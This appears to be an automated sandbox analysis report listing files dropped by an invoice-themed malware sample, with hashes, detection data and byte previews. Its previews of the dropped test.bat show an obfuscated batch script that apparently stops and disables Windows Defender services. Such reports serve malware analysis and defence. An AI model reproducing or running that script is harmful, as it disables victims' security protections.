                                                                                                              Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="876921" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERA6E7.tmp.csv
                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):56208
                                                                                                              Entropy (8bit):3.0530640921878747
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:aDHQeMGIvhCOc9+sA3BCrbKpO+f03hfvc:aDHQeMGIvhCOc9+sA3BCrbKpO+f035vc
                                                                                                              MD5:70B4C3FFC96DD244F3772D6F81B0783C
                                                                                                              SHA1:4B086568DF91ADEA95A354B0BBC745950A51AFFA
                                                                                                              SHA-256:71FAE19F2A3FC6FF96106AD7D829A3D5BE55A3FA06EFA8FEA77E3239E076632A
                                                                                                              SHA-512:7CD460FF3279077C2F22B09676127371D924046A7AF82850FCC9C5F20EBDB378E1BF7C3DA0DD08D08B3257C8300C17355D64E86474F91F4C1037B9A14E8AC24F
                                                                                                              Malicious:false
                                                                                                              Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERACC4.tmp.txt
                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):13340
                                                                                                              Entropy (8bit):2.6955683935498898
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:9GiZYW+TUve8IYHYcb4WgHNYEZhgst2iG9zEXwtIxraKhaAJiOnIS53:9jZD+HQzbQPNaKhaAcZS53
                                                                                                              MD5:9E8DFC94FEF322FE02E9F7E48376894A
                                                                                                              SHA1:12BD9CA05D34330269DA55CC174B9020A91BC5B0
                                                                                                              SHA-256:A81606A41BE21D9687FD67C1FF81BFF367F0F5E6BA228EB72B0E4F404EA72FEB
                                                                                                              SHA-512:6EC0936F401B10A335253BC3FAFE9D710CE8CC3E0DA95E0141C062989BD85E00CC9AFE0EF1CB2512316433F918C1C573C8DDF98DAB5722A1DBA17473484FF392
                                                                                                              Malicious:false
                                                                                                              Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):14734
                                                                                                              Entropy (8bit):4.996142136926143
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:384:SEdVoGIpN6KQkj2Zkjh4iUxZvuiOOdBCNXp5nYoJib4J:SYV3IpNBQkj2Yh4iUxZvuiOOdBCNZlYO
                                                                                                              MD5:B7D3A4EB1F0AED131A6E0EDF1D3C0414
                                                                                                              SHA1:A72E0DDE5F3083632B7242D2407658BCA3E54F29
                                                                                                              SHA-256:8E0EB5898DDF86FE9FE0011DD7AC6711BB0639A8707053D831FB348F9658289B
                                                                                                              SHA-512:F9367BBEC9A44E5C08757576C56B9C8637D8A0A9D6220DE925255888E6A0A088C653E207E211A6796F6A7F469736D538EA5B9E094944316CF4E8189DDD3EED9D
                                                                                                              Malicious:false
                                                                                                              Preview: PSMODULECACHE.............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script................T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):21664
                                                                                                              Entropy (8bit):5.600013791978551
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:384:/tL68qUkj8c5Eh2MQX+Rw4KnKultIqspE9mw7AhBmzq5vxHV03fjj2DI++jp:uj8cSh2Z4KKultAV3qqtibcc
                                                                                                              MD5:250E88BCD42F9C0B7EEB5173BE816D5B
                                                                                                              SHA1:5A1053254E192BE05F99BBC0F0A8ACD7550CC11B
                                                                                                              SHA-256:E0351D82E30A3C884B6950D68A1B7A3F1994B12E48488AF55E6E589FDEBB8D95
                                                                                                              SHA-512:0E4133E4B8B7C1770EA241FECFA883DAC49EA6BF167D8784ADC4F83CA75F7B8415A088DA102BFEAF0824428978346D69A60F99FCBAFDE001B12247C768730E55
                                                                                                              Malicious:false
                                                                                                              Preview: @...e.....................9.............?............@..........H...............<@.^.L."My...:R..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)Z.......System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,j.....(.Microsoft.PowerShell.Commands.ManagementT................7.,.fiD..............*.Microsoft.Management.Inf
                                                                                                              C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe
                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):91000
                                                                                                              Entropy (8bit):6.241345766746317
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                              MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                              SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                              SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                              SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                              Malicious:false
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Joe Sandbox View:
                                                                                                              • Filename: PRODUCT SPECIFICATION.exe, Detection: malicious, Browse
                                                                                                              • Filename: DHL_document1102202068090891.exe, Detection: malicious, Browse
                                                                                                              • Filename: em6eElVbOm.exe, Detection: malicious, Browse
                                                                                                              • Filename: Purchase Order_Pdf.exe, Detection: malicious, Browse
                                                                                                              • Filename: Fireman.exe, Detection: malicious, Browse
                                                                                                              • Filename: NEW ORDER.exe, Detection: malicious, Browse
                                                                                                              • Filename: CN-Invoice-XXXXX9808-19011143287993.exe, Detection: malicious, Browse
                                                                                                              • Filename: payment confirmation 0029175112.exe, Detection: malicious, Browse
                                                                                                              • Filename: Vrxs6evJO7.exe, Detection: malicious, Browse
                                                                                                              • Filename: SecuriteInfo.com.Trojan.GenericKD.36380495.3131.exe, Detection: malicious, Browse
                                                                                                              • Filename: RMe2JcmlSh.exe, Detection: malicious, Browse
                                                                                                              • Filename: New Order 2300030317388 InterMetro.exe, Detection: malicious, Browse
                                                                                                              • Filename: CN-Invoice-XXXXX9808-19011143287989.exe, Detection: malicious, Browse
                                                                                                              • Filename: PURCHASE ITEMS.exe, Detection: malicious, Browse
                                                                                                              • Filename: CN-Invoice-XXXXX9808-19011143287992.exe, Detection: malicious, Browse
                                                                                                              • Filename: quotation_PR # 00459182..exe, Detection: malicious, Browse
                                                                                                              • Filename: PURCHASE ORDER CONFIRMATION.exe, Detection: malicious, Browse
                                                                                                              • Filename: New Order.exe, Detection: malicious, Browse
                                                                                                              • Filename: PO#87498746510.exe, Detection: malicious, Browse
                                                                                                              • Filename: TT.exe, Detection: malicious, Browse
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\test.bat
                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe
                                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8399
                                                                                                              Entropy (8bit):4.665734428420432
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                              MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                              SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                              SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                              SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                              Malicious:false
                                                                                                              Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dhngzly1.1a0.ps1
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:very short file (no magic)
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1
                                                                                                              Entropy (8bit):0.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:U:U
                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                              Malicious:false
                                                                                                              Preview: 1
                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fiaxfjc3.2me.psm1
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:very short file (no magic)
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1
                                                                                                              Entropy (8bit):0.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:U:U
                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                              Malicious:false
                                                                                                              Preview: 1
                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ginmqqci.bv3.ps1
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:very short file (no magic)
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1
                                                                                                              Entropy (8bit):0.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:U:U
                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                              Malicious:false
                                                                                                              Preview: 1
                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xaqb5cyd.oyj.psm1
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:very short file (no magic)
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1
                                                                                                              Entropy (8bit):0.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:U:U
                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                              Malicious:false
                                                                                                              Preview: 1
                                                                                                              C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe
                                                                                                              Process:C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):91000
                                                                                                              Entropy (8bit):6.241345766746317
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                              MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                              SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                              SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                              SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                              Malicious:false
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\test.bat
                                                                                                              Process:C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe
                                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                              Category:modified
                                                                                                              Size (bytes):8399
                                                                                                              Entropy (8bit):4.665734428420432
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                              MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                              SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                              SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                              SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                              Malicious:false
                                                                                                              Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                                              C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe
                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):91000
                                                                                                              Entropy (8bit):6.241345766746317
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                              MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                              SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                              SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                              SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                              Malicious:false
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\test.bat
                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe
                                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8399
                                                                                                              Entropy (8bit):4.665734428420432
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                              MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                              SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                              SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                              SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                              Malicious:false
                                                                                                              Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                                              C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8
                                                                                                              Entropy (8bit):2.75
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Z7yM:F3
                                                                                                              MD5:C987B59C76EA2E8854B59456910A97A9
                                                                                                              SHA1:9C9B6CDCD12E0CD3CDDBC36A37CCCFB39084A0D7
                                                                                                              SHA-256:5B957D5A9AF25F06775FD1CF60B3A0BA352AFF046C25909B1048F39D20A82BE5
                                                                                                              SHA-512:F411FD12E999D64BBAEF9C45C572A194EBE304E3BB8446CDAE95C3630514D01E08405A9D1FDB4D014E307F5B57DA9B5802AC93BD55E5D4251D88B5D2BBC0C9C9
                                                                                                              Malicious:true
                                                                                                              Preview: .......H
                                                                                                              C:\Users\user\Documents\20210225\PowerShell_transcript.367706.KMuPlgZO.20210225151021.txt
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
